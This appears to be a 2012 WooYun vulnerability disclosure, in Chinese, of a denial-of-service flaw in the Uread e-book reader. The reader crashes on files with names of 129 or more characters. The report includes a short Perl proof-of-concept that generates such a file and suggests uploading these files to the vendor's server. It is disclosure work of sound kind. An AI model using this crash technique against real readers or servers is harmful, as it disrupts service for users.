漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07191
漏洞标题:Uread阅读器拒绝服务漏洞
相关厂商:至善读书
漏洞作者: demonalex
提交时间:2012-05-16 15:03
修复时间:2012-06-30 15:03
公开时间:2012-06-30 15:03
漏洞类型:拒绝服务
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-16: 细节已通知厂商并且等待厂商处理中
2012-05-21: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向第三方安全合作伙伴开放
2012-07-15: 细节向核心白帽子及相关领域专家公开
2012-07-25: 细节向普通白帽子公开
2012-08-04: 细节向实习白帽子公开
2012-06-30: 细节向公众公开
简要描述:
Uread阅读器在远程或本地打开upub等文件时,没有对文件名的长度进行过滤,导致打开过长文件名将引起程序崩溃。
详细说明:
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
漏洞证明:
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。
版权声明:转载请注明来源 demonalex@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2012-05-21 00:26
厂商回复:
CNVD确认漏洞并复现所述情况,转由CNCERT协调厂商处置。
对漏洞评分如下:
CVSS:(AV:L/AC:L/Au:NR/C:N/A:C/I:N/B:N) score:4.68(最高10分,中危)
即:本地攻击、攻击难度低、不需要用户认证,对可用性造成完全影响。
技术难度系数:1.1(本地拒绝服务类)
影响危害系数:1.1(一般,终端用户产品)
CNVD综合评分:4.68*1.1*1.1=5.663
demonalex对于通用软件的研究目前在wooyun看比较少,rank +3
最新状态:
暂无